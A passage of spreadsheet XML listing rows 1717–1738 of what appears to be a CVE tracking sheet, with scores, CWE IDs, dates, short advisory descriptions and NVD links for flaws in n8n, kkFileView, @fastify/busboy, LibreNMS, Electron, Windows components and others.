      <c r="J1717" s="5" t="inlineStr"/>
      <c r="K1717" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L1717" s="5" t="inlineStr">
        <is>
          <t>n8n's JavaScript task runner shared a single module cache across all users' Code-node executions. In affected versions (before 1.123.67, 2.31.5, and 2.32.1), a user able to run a Code node could poison a cached module and thereby alter other users' Code-node executions on the same runner, affecting their confidentiality, integrity, or availability. This is a cross-user isolation break within a single n8n instance and does not constitute a sandbox escape or remote code execution. Only multi-user instances running the JS task runner with built-in or external modules enabled are affected.</t>
        </is>
      </c>
      <c r="M1717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72764</t>
        </is>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73243</t>
        </is>
      </c>
      <c r="C1718" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1718" s="5" t="inlineStr"/>
      <c r="F1718" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1718" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H1718" s="5" t="inlineStr"/>
      <c r="I1718" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1718" s="5" t="inlineStr"/>
      <c r="K1718" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1718" s="5" t="inlineStr">
        <is>
          <t>kkFileView is a universal file online preview project based on Spring Boot. Prior to 5.0.1, the unauthenticated GET /addTask endpoint in kkFileView is omitted from TrustHostFilter and TrustDirFilter in server/src/main/java/cn/keking/config/WebConfig.java, allowing FileConvertQueueTask to fetch an attacker-selected URL after FileHandlerService#getFileAttribute uses the fullfilename parameter to force an OFFICE, COMPRESS, or CAD type. This issue is fixed in version 5.0.1.</t>
        </is>
      </c>
      <c r="M1718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73243</t>
        </is>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74866</t>
        </is>
      </c>
      <c r="C1719" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1719" s="5" t="inlineStr"/>
      <c r="F1719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1719" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1719" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/busyboy</t>
        </is>
      </c>
      <c r="I1719" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1719" s="5" t="inlineStr"/>
      <c r="K1719" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L1719" s="5" t="inlineStr">
        <is>
          <t>@fastify/busboy is a multipart form-data parser for Node.js. Its multipart part-header parser splits header lines only on the two-byte carriage-return line-feed sequence, so a lone carriage return or line feed embedded in a part header is not treated as a line break and is carried verbatim into the parsed Content-Disposition filename and field name handed to the application. An attacker who uploads a file whose filename or field name contains a bare carriage return or line feed can inject control characters into consumers that trust the parser to return clean values, enabling filesystem filename pollution, log forging, or header injection when the value is forwarded to a carriage-return-sensitive sink. All versions of @fastify/busboy up to and including 3.2.1 are affected. The issue is fixed in version 3.2.2, which rejects any header line that still contains a bare carriage return or line feed. Users should upgrade to 3.2.2, and consumers such as @fastify/multipart should bump their @fastify/busboy dependency to pull in the fix.</t>
        </is>
      </c>
      <c r="M1719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74866</t>
        </is>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84193</t>
        </is>
      </c>
      <c r="C1720" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1720" s="5" t="inlineStr"/>
      <c r="F1720" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1720" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1720" s="5" t="inlineStr"/>
      <c r="I1720" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1720" s="5" t="inlineStr"/>
      <c r="K1720" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1720" s="5" t="inlineStr">
        <is>
          <t>LibreNMS through 26.2.0 contains a stored cross-site scripting vulnerability in legacy PHP template pages that render unescaped SNMP-sourced data fields including BGP peer descriptions, VRF names, process information, and SLA tags. Attackers with device management access or network access to enroll a rogue SNMP device can inject malicious JavaScript that executes when admins view affected routing and device pages, enabling credential theft and CSRF token exfiltration.</t>
        </is>
      </c>
      <c r="M1720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84193</t>
        </is>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16180</t>
        </is>
      </c>
      <c r="C1721" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1721" s="5" t="inlineStr"/>
      <c r="F1721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1721" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1721" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1721" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1721" s="5" t="inlineStr"/>
      <c r="K1721" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L1721" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 Toolkit could allow an authenticated user to cause a denial-of-service condition due to improper validation of XML entities.</t>
        </is>
      </c>
      <c r="M1721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16180</t>
        </is>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67550</t>
        </is>
      </c>
      <c r="C1722" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1722" s="5" t="inlineStr"/>
      <c r="F1722" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1722" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1722" s="5" t="inlineStr"/>
      <c r="I1722" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1722" s="5" t="inlineStr"/>
      <c r="K1722" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1722" s="5" t="inlineStr">
        <is>
          <t>re2 provides Node.js bindings for Google's RE2 regular expression engine. Prior to 1.25.2, re2 validates lastIndex against the UTF-8 byte length of a subject but uses it as a UTF-16 code-unit offset in exec, test, match, replace, and split, allowing an attacker-influenced lastIndex on a non-ASCII subject to trigger an out-of-bounds heap read and an uncatchable process crash, with limited heap information disclosure in some cases. This issue is fixed in 1.25.2.</t>
        </is>
      </c>
      <c r="M1722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67550</t>
        </is>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68874</t>
        </is>
      </c>
      <c r="C1723" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1723" s="5" t="inlineStr"/>
      <c r="F1723" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1723" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1723" s="5" t="inlineStr"/>
      <c r="I1723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1723" s="5" t="inlineStr"/>
      <c r="K1723" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1723" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t>
        </is>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69349</t>
        </is>
      </c>
      <c r="C1724" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1724" s="5" t="inlineStr"/>
      <c r="F1724" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1724" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1724" s="5" t="inlineStr"/>
      <c r="I1724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1724" s="5" t="inlineStr"/>
      <c r="K1724" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1724" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t>
        </is>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69372</t>
        </is>
      </c>
      <c r="C1725" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1725" s="5" t="inlineStr"/>
      <c r="F1725" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1725" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1725" s="5" t="inlineStr"/>
      <c r="I1725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1725" s="5" t="inlineStr"/>
      <c r="K1725" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1725" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t>
        </is>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69393</t>
        </is>
      </c>
      <c r="C1726" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1726" s="5" t="inlineStr"/>
      <c r="F1726" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1726" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1726" s="5" t="inlineStr"/>
      <c r="I1726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1726" s="5" t="inlineStr"/>
      <c r="K1726" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1726" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t>
        </is>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69405</t>
        </is>
      </c>
      <c r="C1727" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1727" s="5" t="inlineStr"/>
      <c r="F1727" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1727" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1727" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1727" s="5" t="inlineStr"/>
      <c r="K1727" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1727" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M1727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t>
        </is>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69416</t>
        </is>
      </c>
      <c r="C1728" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1728" s="5" t="inlineStr"/>
      <c r="F1728" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1728" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1728" s="5" t="inlineStr"/>
      <c r="I1728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1728" s="5" t="inlineStr"/>
      <c r="K1728" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1728" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M1728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t>
        </is>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69507</t>
        </is>
      </c>
      <c r="C1729" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1729" s="5" t="inlineStr"/>
      <c r="F1729" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1729" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1729" s="5" t="inlineStr"/>
      <c r="I1729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1729" s="5" t="inlineStr"/>
      <c r="K1729" s="5" t="inlineStr">
        <is>
          <t>CWE-538</t>
        </is>
      </c>
      <c r="L1729" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t>
        </is>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69552</t>
        </is>
      </c>
      <c r="C1730" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1730" s="5" t="inlineStr"/>
      <c r="F1730" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1730" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1730" s="5" t="inlineStr"/>
      <c r="I1730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1730" s="5" t="inlineStr"/>
      <c r="K1730" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L1730" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t>
        </is>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69569</t>
        </is>
      </c>
      <c r="C1731" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1731" s="5" t="inlineStr"/>
      <c r="F1731" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1731" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1731" s="5" t="inlineStr"/>
      <c r="I1731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1731" s="5" t="inlineStr"/>
      <c r="K1731" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1731" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t>
        </is>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69572</t>
        </is>
      </c>
      <c r="C1732" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1732" s="5" t="inlineStr"/>
      <c r="F1732" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1732" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1732" s="5" t="inlineStr"/>
      <c r="I1732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1732" s="5" t="inlineStr"/>
      <c r="K1732" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1732" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t>
        </is>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69591</t>
        </is>
      </c>
      <c r="C1733" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1733" s="5" t="inlineStr"/>
      <c r="F1733" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1733" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1733" s="5" t="inlineStr"/>
      <c r="I1733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1733" s="5" t="inlineStr"/>
      <c r="K1733" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1733" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t>
        </is>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69637</t>
        </is>
      </c>
      <c r="C1734" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1734" s="5" t="inlineStr"/>
      <c r="F1734" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1734" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1734" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1734" s="5" t="inlineStr"/>
      <c r="K1734" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L1734" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M1734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t>
        </is>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69679</t>
        </is>
      </c>
      <c r="C1735" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1735" s="5" t="inlineStr"/>
      <c r="F1735" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1735" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1735" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1735" s="5" t="inlineStr"/>
      <c r="K1735" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L1735" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M1735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t>
        </is>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69723</t>
        </is>
      </c>
      <c r="C1736" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1736" s="5" t="inlineStr"/>
      <c r="F1736" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1736" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1736" s="5" t="inlineStr"/>
      <c r="I1736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1736" s="5" t="inlineStr"/>
      <c r="K1736" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1736" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t>
        </is>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70609</t>
        </is>
      </c>
      <c r="C1737" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1737" s="5" t="inlineStr"/>
      <c r="F1737" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1737" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1737" s="5" t="inlineStr"/>
      <c r="I1737" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1737" s="5" t="inlineStr"/>
      <c r="K1737" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94</t>
        </is>
      </c>
      <c r="L1737" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1, the mode option of webContents.openDevTools() was not sanitized before use by the DevTools frontend. If an attacker can influence this value, script under their control may run in the DevTools context, which in unsandboxed configurations has access to Node.js, including when untrusted input reaches the mode argument of openDevTools() or untrusted content calls openDevTools() on a webview it embeds. This issue is fixed in 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M1737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70609</t>
        </is>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85788</t>
        </is>
      </c>
      <c r="C1738" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1738" s="5" t="inlineStr"/>
      <c r="F1738" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1738" s="5" t="inlineStr">
        <is>
          <t>mysql, aws</t>
        </is>
      </c>
      <c r="H1738" s="5" t="inlineStr"/>
      <c r="I1738" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1738" s="5" t="inlineStr"/>
      <c r="K1738" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1738" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in the mutable SQL detector component in Amazon awslabs mysql-mcp-server might allow context-dependent actors to bypass the read-only enforcement gate and reach file-read and file-write SQL sinks via SQL inline comments that the regex engine does not treat as whitespace.
To remediate this issue, users should upgrade to version 1.0.23.</t>
        </is>
      </c>
      <c r="M1738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85788</t>
        </is>
      </c>
    </row>
    <row r="1739">
